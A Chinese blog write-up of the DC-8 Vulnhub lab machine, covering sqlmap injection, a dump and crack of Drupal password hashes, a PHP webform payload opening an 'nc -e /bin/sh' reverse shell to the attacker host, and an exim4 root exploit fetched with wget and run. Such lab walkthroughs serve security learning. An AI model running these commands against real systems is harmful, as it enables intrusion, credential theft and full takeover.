dc-8

最新推荐文章于 2022-09-26 14:05:28 发布
最新推荐文章于 2022-09-26 14:05:28 发布
阅读量220 收藏
点赞数 1
分类专栏: dc-8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45875583/article/details/113851336
版权

扫描主机地址
在这里插入图片描述

扫描开放端口

在这里插入图片描述

开启80端口,访问
随便点点,发现id值,应该存在注入点
在这里插入图片描述
使用sqlmap爆破

python sqlmap.py -u http://192.168.110.136/?nid=1 --dbs

在这里插入图片描述

爆破d7db数据库

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db --tables

在这里插入图片描述
在这里插入图片描述

发现users表,列出字段

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users --columns

在这里插入图片描述
在这里插入图片描述

列出指定字段

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users -C name,pass --dump

在这里插入图片描述
在这里插入图片描述

得到两个用户和加密的密码

admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

使用john破解

在这里插入图片描述

破解了好长时间发现只能破解john用户
登录网站

在这里插入图片描述

登录后点击上面的Find content,选择Contact Us,后点击Webform -> form settings,选择PHP code

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

选择PHP code之后输入代码,点击最下面的Save configuration,kali端监听

<p>GETSHELL</p>
<?php
system("nc -e /bin/sh 192.168.110.11  4567");
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

保存成功点击Contact Us,输入信息后点击Submit

在这里插入图片描述

kali连接成功

python -c 'import pty;pty.spawn("/bin/bash")'

使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限

在这里插入图片描述

查看版本

/usr/sbin/exim4 –version

在这里插入图片描述

查找漏洞

searchsploit exim

在这里插入图片描述

把46996.sh文件拷贝到本地,并改名,然后开启http服务

在这里插入图片描述

在这里插入图片描述

连接的靶机下载文件

wget http://192.168.110.11:8000/root/123.sh

在这里插入图片描述

添加执行权限

chmod +x 123.sh

在这里插入图片描述

根据脚本提示执行命令参数

./123.sh -m netcat

在这里插入图片描述

在这里插入图片描述

找不到文件,可能是脚本的原因。vim打开,:set ff=unix 然后保存退出。靶机重新下载,添加权限,执行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提权成功!

高野01
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-8详细渗透过程
MRS_jianai的博客
12-26 425
DC-8靶机详细渗透过程
DC-8靶机渗透
m0_62008601的博客
06-05 1025
dc-8靶机详细渗透过程
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2979
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2103
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集).zip
05-31
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集) Component Count : 8 Component Name ----------------------------------------------- DC-002 DC-003 DC-003A DC-005 DC-005P DC-012 DC-...
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3492
dc-8靶场详细渗透过程
DC-8靶机渗透测试详细教程
啊醒的博客
05-04 1911
DC-8靶机渗透测试详细教程
VulnHub——DC-8
菜鸟的学习笔记
01-02 206
DC-8 靶机链接 难度:难、比较复杂 目标:获得root权限并读取唯一flag 信息搜集 1、使用Nmap探测靶机并进行详细扫描。 80端口:Drupal7 此版本有sql注入漏洞。 漏洞挖掘与利用 使用sqlmap进行注入攻击。 sqlmap -u http://192.168.3.46/?nid=2 --level 5 --dbs #获取数据库名 sqlmap -u http://192.168.3.46/?nid=2 --level 5 --D d7db --tables #获取d7db数据
靶机渗透 -- DC-8
qq_42785117的博客
09-28 2162
dc-8靶机下载地址:点这里 环境: kali ip: 192.168.157.124 靶机ip:192.168.157.143 渗透阶段 首先寻找靶机IP,以及扫描靶机的端口信息 使用cmsmap扫描,确定CMS名称以及版本 浏览网站,发现疑似注入点 使用sqlmap爆库得到数据 在user表中查询到账户密码 使用john工具进行破解,得到登录密码(这里用户名叫做john也是一种提示...
入侵靶机DC-8
干铮的博客
10-15 2009
DC-8 1.主机发现 使用Nmap进行ping扫描,根据已知mac地址获取ip地址。 Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0049s latency). MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communi
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1852
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
yolo-fastest.zip
07-28
yolo-fastest
mysql安装配置教程.pdf
最新发布
07-28
MySQL的安装配置教程可以细分为以下几个步骤,这里以Windows系统为例进行说明: 一、下载MySQL 1.访问MySQL官网: 1.前往MySQL的官方网站(https://www.mysql.com/)下载MySQL Community Server。 2.选择下载版本: 1.在官网的Downloads页面,选择“MySQL Community (GPL) Downloads”下的“MySQL Installer for Windows”。 2.跳过注册步骤,直接下载MySQL安装包。 二、安装MySQL 1.运行安装包: 1.找到下载好的MySQL安装包文件,双击运行。 2.选择安装类型: 1.在安装向导中,选择安装类型(通常建议选择“Custom”进行自定义安装)。 2.选择操作系统的位数(如64位),并勾选“Enable the Select Features...”等选项(如果提示缺少运行库,需要先安装相应的VC_redist)。 3.设置安装路径: 1.选择MySQL的安装路径和数据存储路径,建议将MySQL安装在非系统盘(如D盘)以避免潜在的问题。 4.设置密码:
./dc-8.sh -m netcat
07-15
这看起来像是运行一个名为"dc-8.sh"的脚本,并使用"netcat"参数。"./"前缀表示在当前目录中执行脚本。"dc-8.sh"是脚本的文件名,"-m"是脚本的选项,"netcat"是选项的参数。根据具体脚本的功能,脚本可能会使用netcat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值